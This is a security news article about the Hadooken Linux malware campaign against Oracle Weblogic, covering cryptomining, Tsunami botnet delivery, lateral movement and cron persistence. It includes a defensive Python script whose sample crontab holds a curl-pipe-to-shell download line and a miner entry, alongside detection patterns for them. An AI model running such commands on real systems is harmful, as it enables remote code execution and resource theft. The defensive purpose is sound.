New Linux Malware Campaign Targets Oracle Weblogic for Crypto Mining
September 13, 2024
Introduction
A new malware campaign has emerged, targeting Linux environments and specifically Oracle Weblogic servers. This sophisticated attack aims to exploit vulnerabilities for cryptocurrency mining and botnet deployment, raising concerns in the cybersecurity community.
The Hadooken Malware
What is Hadooken?
Researchers at cloud security firm Aqua have identified a malware strain dubbed "Hadooken." This malicious software is at the heart of the current campaign, designed with two primary objectives:
  • Deploy cryptocurrency mining software
  • Deliver a Tsunami botnet malware
Attack Methodology
The attackers employ a multi-step process to infiltrate and exploit vulnerable systems:
  1. Exploit known security vulnerabilities and misconfigurations
  2. Use weak credentials to gain initial access
  3. Execute arbitrary code on compromised instances
  4. Deploy two similar payloads (Python and shell script versions)
  5. Retrieve the Hadooken malware from remote servers
"When Hadooken is executed, it drops a Tsunami malware and deploys a crypto miner," explains security researcher Assaf Moran.

Lateral Movement and Persistence
The shell script version of the payload demonstrates advanced capabilities:
  • Iterates through directories containing SSH data
  • Uses gathered information to attack known servers
  • Moves laterally across the organization or connected environments
  • Spreads the Hadooken malware further
To ensure long-term presence on infected systems, Hadooken establishes persistence by creating cron jobs. These scheduled tasks run the cryptocurrency miner at varying frequencies, making detection and removal more challenging.
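The cron persistence described above is something defenders can audit for directly. The following script is an added example, not code from the article or from Aqua: it parses crontab text and flags entries that fetch a remote script into a shell, run a binary from a temp directory, or carry miner-style options. The crontab content, host `198.51.100.7` and pool name are constructed for the demo.

```python
import re
from typing import List, Tuple

# Constructed sample crontab (not from the article); the two bad lines mimic
# the download-and-run and miner-in-tmp patterns described for Hadooken.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/5 * * * * curl -s http://198.51.100.7/x.sh | sh
@hourly /tmp/.hidden/miner -o pool.example.net:3333 --donate-level=1
30 6 * * 1 /usr/local/bin/backup.sh
"""

# Heuristics a defender would check: remote fetch piped into a shell,
# execution from world-writable/temp dirs, and miner-style arguments.
PATTERNS = {
    "remote-fetch-pipe-shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b"),
    "exec-from-tmp-dir": re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/\S+"),
    "miner-like-args": re.compile(r"(\s-o\s+\S+:\d+|--donate-level|stratum\+tcp)"),
}

def parse_crontab(text: str) -> List[Tuple[str, str]]:
    """Split crontab text into (schedule, command) pairs; skip comments and blanks."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                 # @hourly, @reboot, ...
            sched, _, cmd = line.partition(" ")
        else:                                    # five schedule fields, then command
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue
            sched, cmd = " ".join(fields[:5]), fields[5]
        entries.append((sched, cmd))
    return entries

def find_suspicious_cron_entries(text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (schedule, command, matched_rule_names) for each entry hitting a heuristic."""
    hits = []
    for sched, cmd in parse_crontab(text):
        matched = [name for name, rx in PATTERNS.items() if rx.search(cmd)]
        if matched:
            hits.append((sched, cmd, matched))
    return hits

if __name__ == "__main__":
    for sched, cmd, rules in find_suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"[{', '.join(rules)}] {sched} {cmd}")
```

On a real host, feed it the output of `crontab -l` for each user plus the files under `/etc/cron.d` and `/var/spool/cron`; the heuristics are a starting point and should be tuned to what legitimately runs in your environment.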

The Tsunami Botnet Connection

Hadooken's deployment of the Tsunami (also known as Kaiten) botnet is particularly concerning. This distributed denial-of-service (DDoS) tool has a history of targeting Jenkins and Weblogic services in Kubernetes clusters, indicating a potential for widespread disruption.
Infrastructure and Possible Links
The investigation has uncovered two primary IP addresses associated with the campaign:
  • 89.185.85[.]102 (registered in Germany)
  • 185.174.136[.]204 (currently inactive)
Both IPs are linked to Aeza Group Ltd., a company with a presence in Moscow and Frankfurt. Cybersecurity experts have raised concerns about Aeza's rapid growth and potential connections to cybercrime.

"The modus operandi of Aeza and its fast growth can be explained by the recruitment of young developers affiliated to bulletproof hosting providers in Russia offering shelter to cybercrime," researchers noted in a recent report.

Conclusion

The emergence of the Hadooken malware campaign highlights the evolving sophistication of cyber threats targeting Linux environments. By exploiting vulnerabilities in widely-used software like Oracle Weblogic, attackers can potentially gain access to vast computational resources for cryptocurrency mining while also building powerful botnets for future attacks.

As this campaign continues to develop, it's crucial for organizations to strengthen their security measures, particularly around server configurations and access controls. Regular patching, strong authentication practices, and robust monitoring systems are essential in mitigating the risks posed by such advanced and persistent threats.

The involvement of bulletproof hosting providers adds another layer of complexity to the fight against cybercrime, emphasizing the need for international cooperation in addressing these global security challenges.